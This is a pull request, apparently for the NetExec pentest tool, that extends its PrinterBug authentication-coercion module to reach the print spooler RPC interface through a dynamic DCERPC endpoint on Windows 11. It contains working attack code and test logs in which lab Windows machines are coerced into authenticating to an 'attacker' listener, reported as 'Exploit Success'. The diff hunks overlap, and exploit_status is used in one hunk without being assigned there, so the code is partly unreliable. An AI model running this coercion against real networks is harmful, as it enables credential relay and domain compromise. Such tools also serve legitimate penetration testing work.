### PR TITLE
coerce_plus: Support DCERPC for PrinterBug

### DIFF
--- a/nxc/modules/coerce_plus.py
+++ b/nxc/modules/coerce_plus.py
@@ -169,7 +169,7 @@ class NXCModule:
                         context.log.debug("Target is vulnerable to PrinterBug")
                         context.log.highlight("VULNERABLE, PrinterBug")
                         if self.listener is not None:  # exploit
-                            printerbugclass.exploit(printerbugconnect, self.listener, target, self.always_continue, pipe)
+                            exploit_status = printerbugclass.exploit(printerbugconnect, self.listener, target, self.always_continue, pipe)
                             if not self.always_continue and exploit_status:
                                 break
                         printerbugconnect.disconnect()

--- a/nxc/modules/coerce_plus.py
+++ b/nxc/modules/coerce_plus.py
@@ -137,6 +137,7 @@ class NXCModule:
                             if not self.always_continue and exploit_status:
                                 break
                         petitpotamconnect.disconnect()
+                        break
                     else:
                         context.log.debug("Target is not vulnerable to PetitPotam")
                 except Exception as e:

--- a/nxc/modules/coerce_plus.py
+++ b/nxc/modules/coerce_plus.py
@@ -1,4 +1,5 @@
-from impacket.dcerpc.v5 import transport, rprn, even
+from impacket import uuid
+from impacket.dcerpc.v5 import transport, rprn, even, epm
 from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray, NDRPOINTERNULL
 from impacket.dcerpc.v5.dtypes import LPBYTE, USHORT, LPWSTR, DWORD, ULONG, NULL, WSTR, LONG, BOOL, PCHAR, RPC_SID
 from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
@@ -137,7 +138,6 @@ class NXCModule:
                             if not self.always_continue and exploit_status:
                                 break
                         petitpotamconnect.disconnect()
-                        break
                     else:
                         context.log.debug("Target is not vulnerable to PetitPotam")
                 except Exception as e:
@@ -147,32 +147,36 @@ class NXCModule:
         if self.method == "all" or self.method[:2] == "pr":  # PrinterBug
             runmethod = True
             """ PRINTERBUG START """
-            try:
-                printerbugclass = PrinterBugTrigger(context)
-                target = connection.host if not connection.kerberos else connection.hostname + "." + connection.domain
-                printerbugconnect = printerbugclass.connect(
-                    username=connection.username,
-                    password=connection.password,
-                    domain=connection.domain,
-                    lmhash=connection.lmhash,
-                    nthash=connection.nthash,
-                    target=target,
-                    doKerberos=connection.kerberos,
-                    dcHost=connection.kdcHost,
-                    aesKey=connection.aesKey,
-                    pipe="spoolss"
-                )
+            pipes = ["spoolss", "[dcerpc]"]
+            for pipe in pipes:
+                try:
+                    printerbugclass = PrinterBugTrigger(context)
+                    target = connection.host if not connection.kerberos else connection.hostname + "." + connection.domain
+                    printerbugconnect = printerbugclass.connect(
+                        username=connection.username,
+                        password=connection.password,
+                        domain=connection.domain,
+                        lmhash=connection.lmhash,
+                        nthash=connection.nthash,
+                        target=target,
+                        doKerberos=connection.kerberos,
+                        dcHost=connection.kdcHost,
+                        aesKey=connection.aesKey,
+                        pipe=pipe
+                    )
 
-                if printerbugconnect is not None:
-                    context.log.debug("Target is vulnerable to PrinterBug")
-                    context.log.highlight("VULNERABLE, PrinterBug")
-                    if self.listener is not None:  # exploit
-                        printerbugclass.exploit(printerbugconnect, self.listener, target, self.always_continue, "spoolss")
-                    printerbugconnect.disconnect()
-                else:
-                    context.log.debug("Target is not vulnerable to PrinterBug")
-            except Exception as e:
-                context.log.error(f"Error in PrinterBug module: {e}")
+                    if printerbugconnect is not None:
+                        context.log.debug("Target is vulnerable to PrinterBug")
+                        context.log.highlight("VULNERABLE, PrinterBug")
+                        if self.listener is not None:  # exploit
+                            printerbugclass.exploit(printerbugconnect, self.listener, target, self.always_continue, pipe)
+                            if not self.always_continue and exploit_status:
+                                break
+                        printerbugconnect.disconnect()
+                    else:
+                        context.log.debug("Target is not vulnerable to PrinterBug")
+                except Exception as e:
+                    context.log.error(f"Error in PrinterBug module: {e}")
             """ PRINTERBUG END """
 
         if self.method == "all" or self.method[:1] == "m":  # MSEven
@@ -753,15 +757,50 @@ class PrinterBugTrigger:
     def __init__(self, context):
         self.context = context
 
+    def get_dynamic_endpoint(self, interface: bytes, target: str, timeout: int = 5) -> str:
+        string_binding = r"ncacn_ip_tcp:%s[135]" % target
+        rpctransport = transport.DCERPCTransportFactory(string_binding)
+        rpctransport.set_connect_timeout(timeout)
+        dce = rpctransport.get_dce_rpc()
+        self.context.log.debug(
+            "Trying to resolve dynamic endpoint %s" % repr(uuid.bin_to_string(interface))
+        )
+        try:
+            dce.connect()
+        except Exception as e:
+            self.context.log.warning("Failed to connect to endpoint mapper: %s" % e)
+            raise e
+        try:
+            endpoint = epm.hept_map(target, interface, protocol="ncacn_ip_tcp", dce=dce)
+            self.context.log.debug(
+                "Resolved dynamic endpoint %s to %s"
+                % (repr(uuid.bin_to_string(interface)), repr(endpoint))
+            )
+            return endpoint
+        except Exception as e:
+            self.context.log.debug(
+                "Failed to resolve dynamic endpoint %s"
+                % repr(uuid.bin_to_string(interface))
+            )
+            raise e
+
+
     def connect(self, username, password, domain, lmhash, nthash, aesKey, target, doKerberos, dcHost, pipe):
         binding_params = {
             "spoolss": {
                 "stringBinding": r"ncacn_np:%s[\PIPE\spoolss]" % target,
                 "MSRPC_UUID_RPRN": ("12345678-1234-abcd-ef00-0123456789ab", "1.0"),
+                "port": 445
             },
+            "[dcerpc]": {
+                "stringBinding": self.get_dynamic_endpoint(uuidtup_to_bin(("12345678-1234-abcd-ef00-0123456789ab", "1.0")), target),
+                "MSRPC_UUID_RPRN": ("12345678-1234-abcd-ef00-0123456789ab", "1.0"),
+                "port": None
+            }
         }
         rpctransport = transport.DCERPCTransportFactory(binding_params[pipe]["stringBinding"])
-        rpctransport.set_dport(445)
+        if binding_params[pipe]["port"] is not None:
+            rpctransport.set_dport(binding_params[pipe]["port"])
 
         if hasattr(rpctransport, "set_credentials"):
             rpctransport.set_credentials(


### PR DESCRIPTION
## Description

In the newest version of Windows 11 the spoolss named pipe is not available anymore. However, the interface is still available via DCERPC. This pull requests adds this type of interface to the printerbug exploitation.

Please note that coercion in Windows 11 via this method does not seem to support HTTP or SMB anymore, and only connects to DCERPC via port 135 to the specified listener (If someone has more information about this change I am VERY interested). 

## Type of change
- [x] New feature (non-breaking change which adds functionality)

## How Has This Been Tested?
Tested against Windows 10:
```
$ nxc smb -u vagrant -p 'vagrant' --local-auth -M coerce_plus -o 'LISTENER=attacker' "METHOD=printerbug" -- 192.168.56.112
SMB         192.168.56.112  445    WIN10VM      [*] Windows 10 / Server 2019 Build 18362 x64 (name:WIN10VM) (domain:WIN10VM) (signing:False) (SMBv1:False)
SMB         192.168.56.112  445    WIN10VM      [+] WIN10VM\vagrant:vagrant 
COERCE_PLUS 192.168.56.112  445    WIN10VM      VULNERABLE, PrinterBug
COERCE_PLUS 192.168.56.112  445    WIN10VM      Exploit Success, spoolss\RpcRemoteFindFirstPrinterChangeNotificationEx
COERCE_PLUS 192.168.56.112  445    WIN10VM      VULNERABLE, PrinterBug
COERCE_PLUS 192.168.56.112  445    WIN10VM      Exploit Success, [dcerpc]\RpcRemoteFindFirstPrinterChangeNotificationEx
```

Tested against Windows 11:

```
vagrant@debian12:~$ PYTHONPATH=/vagrant/python-lib python3 /vagrant/python-lib/nxc/netexec.py smb -u vagrant -p 'vagrant' --local-auth -M coerce_plus -o 'LISTENER=attacker' "METHOD=printerbug" -- 192.168.56.113
SMB         192.168.56.113  445    WIN11VM          [*] Windows 11 Build 22621 x64 (name:WIN11VM) (domain:WIN11VM) (signing:False) (SMBv1:False)
SMB         192.168.56.113  445    WIN11VM          [+] WIN11VM\vagrant:vagrant (PRIVILEGED!)
COERCE_PLUS 192.168.56.113  445    WIN11VM          VULNERABLE, PrinterBug
COERCE_PLUS 192.168.56.113  445    WIN11VM          Exploit Success, [dcerpc]\RpcRemoteFindFirstPrinterChangeNotificationEx
```
